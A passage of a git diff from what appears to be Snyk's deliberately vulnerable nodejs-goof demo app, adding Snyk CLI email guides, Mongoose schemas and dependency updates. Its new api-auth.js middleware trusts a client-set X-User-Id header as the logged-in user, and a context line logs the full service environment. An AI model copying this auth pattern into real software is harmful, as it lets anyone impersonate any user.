file instead of piping, run the Snyk command with --json and save to a file, then run: + snyk-to-html -i .json -o .html diff --git a/docs/snyk-html-reports-email-keith.txt b/docs/snyk-html-reports-email-keith.txt new file mode 100644 index 00000000000..057ec586ceb --- /dev/null +++ b/docs/snyk-html-reports-email-keith.txt @@ -0,0 +1,68 @@ +Subject: Exporting SAST, SCA, and container scan results to HTML reports + +Hi Keith, + +You can export your SAST, SCA, and container scan results to HTML reports using the Snyk CLI and the snyk-to-html tool. That way you get shareable HTML files (e.g. for internal reporting or audits) in addition to the results in the Snyk dashboard. + +snyk-to-html is Snyk's official tool for turning CLI JSON output into HTML. It's published on npm by Snyk (https://www.npmjs.com/package/snyk-to-html), and the source is in Snyk's GitHub repo (https://github.com/snyk/snyk-to-html). You can also find it in our docs under CLI tools. + +Using this on Windows with C#, Java, or Python + +snyk-to-html is a Node.js tool, so you need Node.js (and npm) installed to run it—even if your app is C#, Java, or Python. Install the LTS version from https://nodejs.org. You can install the Snyk CLI the same way (npm) or use the standalone Windows executable (https://github.com/snyk/cli/releases or https://downloads.snyk.io/cli/stable/snyk-win.exe). + +Then install both tools (if using npm for Snyk CLI): + + npm install -g snyk snyk-to-html + +Run the scan and HTML commands from your project directory in PowerShell or cmd (the pipe | works in both). Use the directory that contains your manifest: + + • C# — folder with your .sln or .csproj (e.g. cd C:\path\to\MyApp) + • Java — folder with pom.xml or build.gradle + • Python — folder with requirements.txt or pyproject.toml + +The same commands below apply; Snyk will detect the project type. Example for any of these: + + snyk test --json | snyk-to-html -o report-opensource.html + snyk code test --json | snyk-to-html -o report-code.html + +If you already have the Snyk CLI and only need the HTML converter: + + npm install snyk-to-html -g + +Then run your usual Snyk scan with --json and pipe the output into snyk-to-html. Replace the placeholders with your project names, paths, and image names. + +SAST (Snyk Code) + Run from the root of the repo you're scanning (e.g. CBCVinnovationTech or PCBBWeb): + snyk code test --json | snyk-to-html -o -code.html + + Example: snyk code test --json | snyk-to-html -o PCBBWeb-code.html + +SCA (Open Source / dependencies) + If the project has a manifest (pom.xml, build.gradle, package.json, etc.) at the repo root: + snyk test --json | snyk-to-html -o -opensource.html + + For PCBBWeb (unmanaged JARs in sharedlibs, no manifest), use the same approach you're already using for monitor, but with --json and then pipe to snyk-to-html: + snyk test --scan-all-unmanaged --file=PCBBWeb/sharedlibs --json | snyk-to-html -o -opensource.html + + Example: snyk test --scan-all-unmanaged --file=PCBBWeb/sharedlibs --json | snyk-to-html -o PCBBWeb-opensource.html + +Container + After you've built your image (e.g. docker build -t :local .), run: + snyk container test :local --json | snyk-to-html -o -container.html + + Example: snyk container test myapp:local --json | snyk-to-html -o myapp-container.html + +Placeholders: + — Any name you want for the report (e.g. PCBBWeb, CBCVinnovationTech, weekly-scan). It's used in the output filename. + — The same image name you used in docker build -t (e.g. myapp:local). + +The HTML files are written in the current directory unless you add a path in -o (e.g. -o reports/PCBBWeb-code.html). You can open the HTML file in a browser to view or share the results. + +If you prefer to save the JSON first and then convert (e.g. for debugging or re-running the HTML step): + snyk code test --json > results.json + snyk-to-html -i results.json -o results.html + +Let me know if you run into any issues or want to add IaC (Terraform/Kubernetes) reports later. + +Thanks, +Phil diff --git a/docs/snyk-upload-email-draft.txt b/docs/snyk-upload-email-draft.txt new file mode 100644 index 00000000000..432f565f383 --- /dev/null +++ b/docs/snyk-upload-email-draft.txt @@ -0,0 +1,14 @@ +Subject: Snyk CLI commands – pushing results to the dashboard + +Hey, + +We talked about the CLI commands on the call. Here are the ones you ran before, plus the container and infrastructure-as-code ones. + +These all push results up to your Snyk dashboard: + +• SCA (dependencies): snyk monitor --project-name="sca/nodejs-goof" --remote-repo-url="https://github.com/Snyk-Integration-App/nodejs-goof" +• SAST (code): snyk code test --report --target-name="nodejs-goof" --project-name="sast" +• IaC: snyk iac test vulnerable.tf --report --remote-repo-url="https://github.com/Snyk-Integration-App/nodejs-goof" --target-name="nodejs-goof/iac" +• Containers: snyk container monitor --project-name="container/nodejs-goof" + +Replace the repo URL and project name (e.g. nodejs-goof) with yours. For containers, use your image in place of . Run from your project directory (or pass the path to your Terraform/Kubernetes/CloudFormation files where it applies). diff --git a/middleware/api-auth.js b/middleware/api-auth.js new file mode 100644 index 00000000000..c88e30ded1b --- /dev/null +++ b/middleware/api-auth.js @@ -0,0 +1,39 @@ +/** + * API authentication: resolve "current user" from X-User-Id header or session. + * All /api/* workspace and todo endpoints should use requireApiUser to ensure a user is set. + */ + +function getApiUserId(req) { + var headerId = req.get && req.get('X-User-Id'); + if (headerId && typeof headerId === 'string' && headerId.trim()) { + return headerId.trim(); + } + if (req.session && req.session.loggedIn === 1 && req.session.username) { + return req.session.username; + } + return null; +} + +/** + * Middleware: set req.apiUserId. Does not reject if missing (call requireApiUser for that). + */ +function setApiUser(req, res, next) { + req.apiUserId = getApiUserId(req); + next(); +} + +/** + * Middleware: require that a current user is present. Responds 401 if not. + */ +function requireApiUser(req, res, next) { + if (!req.apiUserId) { + return res.status(401).json({ error: 'Authentication required. Set X-User-Id header or log in via session.' }); + } + next(); +} + +module.exports = { + getApiUserId: getApiUserId, + setApiUser: setApiUser, + requireApiUser: requireApiUser, +}; diff --git a/mongoose-db.js b/mongoose-db.js index 3c0966eeb25..c128305eb51 100644 --- a/mongoose-db.js +++ b/mongoose-db.js @@ -2,13 +2,97 @@ var mongoose = require('mongoose'); var cfenv = require("cfenv"); var Schema = mongoose.Schema; +var ObjectId = Schema.Types.ObjectId; + var Todo = new Schema({ content: Buffer, + content_str: { type: String, default: '', select: false }, + content_hash: { type: String, index: true, sparse: true }, + due_date: Date, + priority: { type: String, enum: ['low', 'medium', 'high'] }, + tags: [String], updated_at: Date, + workspace: { type: ObjectId, ref: 'Workspace', default: null }, + deleted_at: { type: Date, default: null }, }); - +Todo.index({ workspace: 1, updated_at: -1 }); +Todo.index({ workspace: 1, due_date: 1 }); mongoose.model('Todo', Todo); +var Workspace = new Schema({ + name: { type: String, required: true }, + slug: { type: String, required: true, unique: true }, + createdAt: { type: Date, default: Date.now }, + settings: { type: Schema.Types.Mixed, default: {} }, +}); +Workspace.index({ slug: 1 }); +mongoose.model('Workspace', Workspace); + +var ROLES = ['owner', 'admin', 'member', 'viewer']; +var WorkspaceMember = new Schema({ + workspace: { type: ObjectId, ref: 'Workspace', required: true }, + user: { type: String, required: true }, + role: { type: String, enum: ROLES, required: true }, +}); +WorkspaceMember.index({ workspace: 1, user: 1 }, { unique: true }); +WorkspaceMember.index({ user: 1 }); +mongoose.model('WorkspaceMember', WorkspaceMember); + +var AuditEvent = new Schema({ + workspace: { type: ObjectId, ref: 'Workspace', required: true }, + actor: { type: String, required: true }, + action: { type: String, required: true }, + resourceType: { type: String, enum: ['todo', 'workspace', 'member'], required: true }, + resourceId: { type: String, required: true }, + details: { type: Schema.Types.Mixed, default: {} }, + ip: { type: String, default: null }, + createdAt: { type: Date, default: Date.now }, +}); +AuditEvent.index({ workspace: 1, createdAt: -1 }); +AuditEvent.index({ workspace: 1, action: 1, resourceType: 1, actor: 1 }); +mongoose.model('AuditEvent', AuditEvent); + +var Webhook = new Schema({ + workspace: { type: ObjectId, ref: 'Workspace', required: true }, + url: { type: String, required: true }, + secret: { type: String, required: true }, + events: [String], + active: { type: Boolean, default: true }, + createdAt: { type: Date, default: Date.now }, + lastFailure: { + status: String, + statusCode: Number, + error: String, + attemptedAt: Date, + }, +}); +Webhook.index({ workspace: 1 }); +mongoose.model('Webhook', Webhook); + +var WebhookDelivery = new Schema({ + webhook: { type: ObjectId, ref: 'Webhook', required: true }, + url: { type: String, required: true }, + status: { type: String, enum: ['pending', 'success', 'failed'], default: 'pending' }, + statusCode: { type: Number, default: null }, + error: { type: String, default: null }, + attemptedAt: { type: Date, default: Date.now }, +}); +WebhookDelivery.index({ webhook: 1, attemptedAt: -1 }); +mongoose.model('WebhookDelivery', WebhookDelivery); + +var Rule = new Schema({ + workspace: { type: ObjectId, ref: 'Workspace', required: true }, + name: { type: String, required: true }, + enabled: { type: Boolean, default: true }, + trigger: { type: String, enum: ['schedule', 'todo.created', 'todo.updated'], required: true }, + schedule: { type: String, default: null }, + conditions: { type: Schema.Types.Mixed, default: [] }, + actions: { type: Schema.Types.Mixed, default: [] }, +}); +Rule.index({ workspace: 1 }); +Rule.index({ workspace: 1, trigger: 1, enabled: 1 }); +mongoose.model('Rule', Rule); + var User = new Schema({ username: String, password: String, @@ -16,6 +100,15 @@ var User = new Schema({ mongoose.model('User', User); +var Note = new Schema({ + title: String, + content: String, + created_at: Date, + updated_at: Date, +}); + +mongoose.model('Note', Note); + // CloudFoundry env vars var mongoCFUri = cfenv.getAppEnv().getServiceURL('goof-mongo'); console.log(JSON.stringify(cfenv.getAppEnv())); diff --git a/package-lock.json b/package-lock.json index ba272cdaa90..4b8ac39a3c2 100644 --- a/package-lock.json +++ b/package-lock.json @@ -13,6 +13,7 @@ "body-parser": "1.9.0", "cfenv": "^1.0.4", "consolidate": "0.14.5", + "csv-parse": "^6.1.0", "dompurify": "^3.3.0", "dustjs-helpers": "1.5.0", "dustjs-linkedin": "2.5.0", @@ -37,7 +38,9 @@ "mongoose": "6.13.6", "morgan": "latest", "ms": "^0.7.1", + "multer": "^2.0.2", "mysql": "^2.18.1", + "node-cron": "^3.0.3", "npmconf": "0.0.24", "optional": "^0.1.3", "st": "0.2.4", @@ -2491,6 +2494,12 @@ "node": ">= 6.0.0" } }, + "node_modules/append-field": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/append-field/-/append-field-1.0.0.tgz", + "integrity": "sha512-klpgFSWLW1ZEs8svjfb7g4qWY0YS5imI82dTg+QahUvJ8YqAY0P10Uk8tTyh9ZGuYEZEMaeJYCF5BFuX552hsw==", + "license": "MIT" + }, "node_modules/archy": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/archy/-/archy-1.0.0.tgz", @@ -3108,14 +3117,14 @@ "dev": true }, "node_modules/busboy": { - "version": "0.3.1", - "resolved": "https://registry.npmjs.org/busboy/-/busboy-0.3.1.tgz", - "integrity": "sha512-y7tTxhGKXcyBxRKAni+awqx8uqaJKrSFSNFSeRG5CsWNdmy2BIK+6VGWEW7TZnIO/533mtMEA4rOevQV815YJw==", + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/busboy/-/busboy-1.6.0.tgz", + "integrity": "sha512-8SFQbg/0hQ9xy3UNTB0YEnsNBbWfhf7RtnzpL7TkBiTBRfrQ9Fxcnz7VJsleJpyp6rVLvXiuORqjlHi5q+PYuA==", "dependencies": { - "dicer": "0.3.0" + "streamsearch": "^1.1.0" }, "engines": { - "node": ">=4.5.0" + "node": ">=10.16.0" } }, "node_modules/bytes": { @@ -3940,6 +3949,12 @@ "node": ">=20" } }, + "node_modules/csv-parse": { + "version": "6.1.0", + "resolved": "https://registry.npmjs.org/csv-parse/-/csv-parse-6.1.0.tgz", + "integrity": "sha512-CEE+jwpgLn+MmtCpVcPtiCZpVtB6Z2OKPTr34pycYYoL7sxdOkXDdQ4lRiw6ioC0q6BLqhc6cKweCVvral8yhw==", + "license": "MIT" + }, "node_modules/dash-ast": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/dash-ast/-/dash-ast-1.0.0.tgz", @@ -4158,17 +4173,6 @@ "integrity": "sha1-yY2bzvdWdBiOEQlpFRGZ45sfppM=", "dev": true }, - "node_modules/dicer": { - "version": "0.3.0", - "resolved": "https://registry.npmjs.org/dicer/-/dicer-0.3.0.tgz", - "integrity": "sha512-MdceRRWqltEG2dZqO769g27N/3PXfcKl04VhYnBlo2YhH7zPi88VebsjTKclaOyiuMaGU72hTfw3VkUitGcVCA==", - "dependencies": { - "streamsearch": "0.1.2" - }, - "engines": { - "node": ">=4.5.0" - } - }, "node_modules/diff": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/diff/-/diff-1.4.0.tgz", @@ -6796,9 +6800,13 @@ } }, "node_modules/minimist": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.0.tgz", - "integrity": "sha1-o1AIsg9BOD7sH7kU9M1d95omQoQ=" + "version": "1.2.8", + "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", + "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==", + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } }, "node_modules/minipass": { "version": "2.9.0", @@ -7132,6 +7140,128 @@ "resolved": "https://registry.npmjs.org/ms/-/ms-0.7.3.tgz", "integrity": "sha1-cIFVpeROM/X9D8U+gdDUCpG+H/8=" }, + "node_modules/multer": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/multer/-/multer-2.0.2.tgz", + "integrity": "sha512-u7f2xaZ/UG8oLXHvtF/oWTRvT44p9ecwBBqTwgJVq0+4BW1g8OW01TyMEGWBHbyMOYVHXslaut7qEQ1meATXgw==", + "license": "MIT", + "dependencies": { + "append-field": "^1.0.0", + "busboy": "^1.6.0", + "concat-stream": "^2.0.0", + "mkdirp": "^0.5.6", + "object-assign": "^4.1.1", + "type-is": "^1.6.18", + "xtend": "^4.0.2" + }, + "engines": { + "node": ">= 10.16.0" + } + }, + "node_modules/multer/node_modules/concat-stream": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/concat-stream/-/concat-stream-2.0.0.tgz", + "integrity": "sha512-MWufYdFw53ccGjCA+Ol7XJYpAlW6/prSMzuPOTRnJGcGzuhLn4Scrz7qf6o8bROZ514ltazcIFJZevcfbo0x7A==", + "engines": [ + "node >= 6.0" + ], + "license": "MIT", + "dependencies": { + "buffer-from": "^1.0.0", + "inherits": "^2.0.3", + "readable-stream": "^3.0.2", + "typedarray": "^0.0.6" + } + }, + "node_modules/multer/node_modules/mime-db": { + "version": "1.52.0", + "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", + "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", + "license": "MIT", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/multer/node_modules/mime-types": { + "version": "2.1.35", + "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", + "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", + "license": "MIT", + "dependencies": { + "mime-db": "1.52.0" + }, + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/multer/node_modules/mkdirp": { + "version": "0.5.6", + "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", + "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", + "license": "MIT", + "dependencies": { + "minimist": "^1.2.6" + }, + "bin": { + "mkdirp": "bin/cmd.js" + } + }, + "node_modules/multer/node_modules/readable-stream": { + "version": "3.6.2", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-3.6.2.tgz", + "integrity": "sha512-9u/sniCrY3D5WdsERHzHE4G2YCXqoG5FTHUiCC4SIbr6XcLZBY05ya9EKjYek9O5xOAwjGq+1JdGBAS7Q9ScoA==", + "license": "MIT", + "dependencies": { + "inherits": "^2.0.3", + "string_decoder": "^1.1.1", + "util-deprecate": "^1.0.1" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/multer/node_modules/safe-buffer": { + "version": "5.2.1", + "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", + "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "license": "MIT" + }, + "node_modules/multer/node_modules/string_decoder": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.3.0.tgz", + "integrity": "sha512-hkRX8U1WjJFd8LsDJ2yQ/wWWxaopEsABU1XfkM8A+j0+85JAGppt16cr1Whg6KIbb4okU6Mql6BOj+uup/wKeA==", + "license": "MIT", + "dependencies": { + "safe-buffer": "~5.2.0" + } + }, + "node_modules/multer/node_modules/type-is": { + "version": "1.6.18", + "resolved": "https://registry.npmjs.org/type-is/-/type-is-1.6.18.tgz", + "integrity": "sha512-TkRKr9sUTxEH8MdfuCSP7VizJyzRNMjj2J2do2Jr3Kym598JVdEksuzPQCnlFPW4ky9Q+iA+ma9BGm06XQBy8g==", + "license": "MIT", + "dependencies": { + "media-typer": "0.3.0", + "mime-types": "~2.1.24" + }, + "engines": { + "node": ">= 0.6" + } + }, "node_modules/mute-stream": { "version": "0.0.7", "resolved": "https://registry.npmjs.org/mute-stream/-/mute-stream-0.0.7.tgz", @@ -7233,6 +7363,27 @@ "integrity": "sha512-1nh45deeb5olNY7eX82BkPO7SSxR5SSYJiPTrTdFUVYwAl8CKMA5N9PjTYkHiRjisVcxcQ1HXdLhx2qxxJzLNQ==", "dev": true }, + "node_modules/node-cron": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/node-cron/-/node-cron-3.0.3.tgz", + "integrity": "sha512-dOal67//nohNgYWb+nWmg5dkFdIwDm8EpeGYMekPMrngV3637lqnX0lbUcCtgibHTz6SEz7DAIjKvKDFYCnO1A==", + "license": "ISC", + "dependencies": { + "uuid": "8.3.2" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/node-cron/node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "license": "MIT", + "bin": { + "uuid": "dist/bin/uuid" + } + }, "node_modules/nodemon": { "version": "2.0.7", "resolved": "https://registry.npmjs.org/nodemon/-/nodemon-2.0.7.tgz", @@ -13553,11 +13704,11 @@ } }, "node_modules/streamsearch": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/streamsearch/-/streamsearch-0.1.2.tgz", - "integrity": "sha1-gIudDlb8Jz2Am6VzOOkpkZoanxo=", + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/streamsearch/-/streamsearch-1.1.0.tgz", + "integrity": "sha512-Mcc5wHehp9aXz1ax6bZUyY5afg9u2rv5cqQI3mRrYkGC8rW2hM02jWuwjtL++LS5qinSyhj2QfLyNsuc+VsExg==", "engines": { - "node": ">=0.8.0" + "node": ">=10.0.0" } }, "node_modules/string_decoder": { @@ -14268,8 +14419,7 @@ "node_modules/typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", - "integrity": "sha1-hnrHTjhkGHsdPUfZlqeOxciDB3c=", - "dev": true + "integrity": "sha1-hnrHTjhkGHsdPUfZlqeOxciDB3c=" }, "node_modules/typedarray-to-buffer": { "version": "3.1.5", @@ -14363,11 +14513,6 @@ "node": ">=6" } }, - "node_modules/typeorm/node_modules/minimist": { - "version": "1.2.5", - "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.5.tgz", - "integrity": "sha512-FM9nNUYrRBAELZQT3xeZQ7fmMOBg6nWNmJKTcgsJeaLstP/UODVpGsr5OhXhhXg6f+qtJ8uiZ+PUxkDWcgIXLw==" - }, "node_modules/typeorm/node_modules/mkdirp": { "version": "0.5.5", "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.5.tgz", @@ -14995,10 +15140,10 @@ } }, "node_modules/xtend": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/xtend/-/xtend-4.0.1.tgz", - "integrity": "sha1-pcbVMr5lbiPbgg77lDofBJmNY68=", - "dev": true, + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/xtend/-/xtend-4.0.2.tgz", + "integrity": "sha512-LKYU1iAXJXUgAXn9URjiu+MWhyUXHsvfp7mcuYm9dSUKK0/CjtrUwFAxD82/mCWbtLsGjFIad0wIsod4zrTAEQ==", + "license": "MIT", "engines": { "node": ">=0.4" } @@ -17168,6 +17313,11 @@ "resolved": "https://registry.npmjs.org/app-root-path/-/app-root-path-3.0.0.tgz", "integrity": "sha512-qMcx+Gy2UZynHjOHOIXPNvpf+9cjvk3cWrBBK7zg4gH9+clobJRb9NGzcT7mQTcV/6Gm/1WelUtqxVXnNlrwcw==" }, + "append-field": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/append-field/-/append-field-1.0.0.tgz", + "integrity": "sha512-klpgFSWLW1ZEs8svjfb7g4qWY0YS5imI82dTg+QahUvJ8YqAY0P10Uk8tTyh9ZGuYEZEMaeJYCF5BFuX552hsw==" + }, "archy": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/archy/-/archy-1.0.0.tgz", @@ -17725,11 +17875,11 @@ "dev": true }, "busboy": { - "version": "0.3.1", - "resolved": "https://registry.npmjs.org/busboy/-/busboy-0.3.1.tgz", - "integrity": "sha512-y7tTxhGKXcyBxRKAni+awqx8uqaJKrSFSNFSeRG5CsWNdmy2BIK+6VGWEW7TZnIO/533mtMEA4rOevQV815YJw==", + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/busboy/-/busboy-1.6.0.tgz", + "integrity": "sha512-8SFQbg/0hQ9xy3UNTB0YEnsNBbWfhf7RtnzpL7TkBiTBRfrQ9Fxcnz7VJsleJpyp6rVLvXiuORqjlHi5q+PYuA==", "requires": { - "dicer": "0.3.0" + "streamsearch": "^1.1.0" } }, "bytes": { @@ -18406,6 +18556,11 @@ "css-tree": "^3.1.0" } }, + "csv-parse": { + "version": "6.1.0", + "resolved": "https://registry.npmjs.org/csv-parse/-/csv-parse-6.1.0.tgz", + "integrity": "sha512-CEE+jwpgLn+MmtCpVcPtiCZpVtB6Z2OKPTr34pycYYoL7sxdOkXDdQ4lRiw6ioC0q6BLqhc6cKweCVvral8yhw==" + }, "dash-ast": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/dash-ast/-/dash-ast-1.0.0.tgz", @@ -18578,14 +18733,6 @@ } } }, - "dicer": { - "version": "0.3.0", - "resolved": "https://registry.npmjs.org/dicer/-/dicer-0.3.0.tgz", - "integrity": "sha512-MdceRRWqltEG2dZqO769g27N/3PXfcKl04VhYnBlo2YhH7zPi88VebsjTKclaOyiuMaGU72hTfw3VkUitGcVCA==", - "requires": { - "streamsearch": "0.1.2" - } - }, "diff": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/diff/-/diff-1.4.0.tgz", @@ -20746,9 +20893,9 @@ } }, "minimist": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.0.tgz", - "integrity": "sha1-o1AIsg9BOD7sH7kU9M1d95omQoQ=" + "version": "1.2.8", + "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", + "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==" }, "minipass": { "version": "2.9.0", @@ -21022,6 +21169,86 @@ "resolved": "https://registry.npmjs.org/ms/-/ms-0.7.3.tgz", "integrity": "sha1-cIFVpeROM/X9D8U+gdDUCpG+H/8=" }, + "multer": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/multer/-/multer-2.0.2.tgz", + "integrity": "sha512-u7f2xaZ/UG8oLXHvtF/oWTRvT44p9ecwBBqTwgJVq0+4BW1g8OW01TyMEGWBHbyMOYVHXslaut7qEQ1meATXgw==", + "requires": { + "append-field": "^1.0.0", + "busboy": "^1.6.0", + "concat-stream": "^2.0.0", + "mkdirp": "^0.5.6", + "object-assign": "^4.1.1", + "type-is": "^1.6.18", + "xtend": "^4.0.2" + }, + "dependencies": { + "concat-stream": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/concat-stream/-/concat-stream-2.0.0.tgz", + "integrity": "sha512-MWufYdFw53ccGjCA+Ol7XJYpAlW6/prSMzuPOTRnJGcGzuhLn4Scrz7qf6o8bROZ514ltazcIFJZevcfbo0x7A==", + "requires": { + "buffer-from": "^1.0.0", + "inherits": "^2.0.3", + "readable-stream": "^3.0.2", + "typedarray": "^0.0.6" + } + }, + "mime-db": { + "version": "1.52.0", + "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", + "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==" + }, + "mime-types": { + "version": "2.1.35", + "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", + "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", + "requires": { + "mime-db": "1.52.0" + } + }, + "mkdirp": { + "version": "0.5.6", + "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", + "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", + "requires": { + "minimist": "^1.2.6" + } + }, + "readable-stream": { + "version": "3.6.2", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-3.6.2.tgz", + "integrity": "sha512-9u/sniCrY3D5WdsERHzHE4G2YCXqoG5FTHUiCC4SIbr6XcLZBY05ya9EKjYek9O5xOAwjGq+1JdGBAS7Q9ScoA==", + "requires": { + "inherits": "^2.0.3", + "string_decoder": "^1.1.1", + "util-deprecate": "^1.0.1" + } + }, + "safe-buffer": { + "version": "5.2.1", + "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", + "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==" + }, + "string_decoder": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.3.0.tgz", + "integrity": "sha512-hkRX8U1WjJFd8LsDJ2yQ/wWWxaopEsABU1XfkM8A+j0+85JAGppt16cr1Whg6KIbb4okU6Mql6BOj+uup/wKeA==", + "requires": { + "safe-buffer": "~5.2.0" + } + }, + "type-is": { + "version": "1.6.18", + "resolved": "https://registry.npmjs.org/type-is/-/type-is-1.6.18.tgz", + "integrity": "sha512-TkRKr9sUTxEH8MdfuCSP7VizJyzRNMjj2J2do2Jr3Kym598JVdEksuzPQCnlFPW4ky9Q+iA+ma9BGm06XQBy8g==", + "requires": { + "media-typer": "0.3.0", + "mime-types": "~2.1.24" + } + } + } + }, "mute-stream": { "version": "0.0.7", "resolved": "https://registry.npmjs.org/mute-stream/-/mute-stream-0.0.7.tgz", @@ -21103,6 +21330,21 @@ "integrity": "sha512-1nh45deeb5olNY7eX82BkPO7SSxR5SSYJiPTrTdFUVYwAl8CKMA5N9PjTYkHiRjisVcxcQ1HXdLhx2qxxJzLNQ==", "dev": true }, + "node-cron": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/node-cron/-/node-cron-3.0.3.tgz", + "integrity": "sha512-dOal67//nohNgYWb+nWmg5dkFdIwDm8EpeGYMekPMrngV3637lqnX0lbUcCtgibHTz6SEz7DAIjKvKDFYCnO1A==", + "requires": { + "uuid": "8.3.2" + }, + "dependencies": { + "uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==" + } + } + }, "nodemon": { "version": "2.0.7", "resolved": "https://registry.npmjs.org/nodemon/-/nodemon-2.0.7.tgz", @@ -25961,9 +26203,9 @@ "integrity": "sha1-l+mNj6TRBdYqJpHR3AfoINuN/E8=" }, "streamsearch": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/streamsearch/-/streamsearch-0.1.2.tgz", - "integrity": "sha1-gIudDlb8Jz2Am6VzOOkpkZoanxo=" + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/streamsearch/-/streamsearch-1.1.0.tgz", + "integrity": "sha512-Mcc5wHehp9aXz1ax6bZUyY5afg9u2rv5cqQI3mRrYkGC8rW2hM02jWuwjtL++LS5qinSyhj2QfLyNsuc+VsExg==" }, "string_decoder": { "version": "0.10.31", @@ -26562,8 +26804,7 @@ "typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", - "integrity": "sha1-hnrHTjhkGHsdPUfZlqeOxciDB3c=", - "dev": true + "integrity": "sha1-hnrHTjhkGHsdPUfZlqeOxciDB3c=" }, "typedarray-to-buffer": { "version": "3.1.5", @@ -26642,11 +26883,6 @@ "path-exists": "^3.0.0" } }, - "minimist": { - "version": "1.2.5", - "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.5.tgz", - "integrity": 